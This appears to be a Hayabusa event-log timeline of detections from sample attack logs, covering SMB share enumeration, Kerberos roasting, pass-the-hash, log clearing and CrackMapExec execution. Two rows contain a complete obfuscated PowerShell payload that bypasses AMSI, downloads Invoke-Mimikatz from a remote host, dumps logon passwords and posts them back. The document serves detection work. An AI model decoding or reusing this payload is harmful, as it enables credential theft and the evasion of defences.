+00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cf99e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:00:10.730 +00:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f96be,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:17.723 +00:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 
0x3902ac4,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:17.762 +00:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df84d08,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:17.790 +00:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d352ca,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:17.920 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13fa915,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:18.001 +00:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x87371f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:20.658 
+00:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:30.691 +00:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:37.825 +00:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x3902ff1,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:37.866 +00:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df8549a,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:37.904 +00:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 
0x57d35acf,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:37.916 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13faf39,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:37.917 +00:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x873c5b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:40.730 +00:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:50.745 +00:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 
0x5ddeb1e0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:04:00.785 +00:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:04:10.808 +00:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-29 07:55:53.423 +00:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.433 +00:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.435 +00:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: 
Bob | LID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.436 +00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer: | IP Addr: 192.168.1.2 | LID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.681 +00:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.683 +00:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.683 +00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer: | IP Addr: 192.168.1.2 | LID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.869 +00:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.869 +00:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: 
::ffff:192.168.1.2 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.980 +00:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Bob | LID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:58:02.652 +00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:58:02.666 +00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: 192.168.1.100 | LID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:58:02.761 +00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:58:28.422 +00:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:58:28.425 
+00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:59:42.537 +00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:59:42.545 +00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 09:23:54.244 +00:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 09:23:58.690 +00:00,DC-Server-1.labcorp.local,4776,info,,NTLM Logon To Local Account,User: Alice | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 09:23:58.691 +00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Alice | Computer: | IP Addr: 192.168.1.200 | LID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets 
Kerberoasting/Security.evtx +2021-04-29 09:23:58.691 +00:00,DC-Server-1.labcorp.local,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 09:23:58.718 +00:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 09:23:58.718 +00:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.200 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 09:23:58.726 +00:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL | Svc: sql101 | IP Addr: ::ffff:192.168.1.200 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 09:23:58.735 +00:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Alice | LID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-30 20:27:39.761 +00:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" 
-JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108
G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x36df3b7 | PID: 7728 | PGUID: 9828DA72-683B-608C-A30C-000000000C00 | Hash: 
SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.761 +00:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.761 +00:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.761 +00:00,win10-02.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.761 +00:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation_sysmon/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.761 +00:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell 
Commandlines,,rules/sigma/process_creation_sysmon/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.911 +00:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@
45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' 
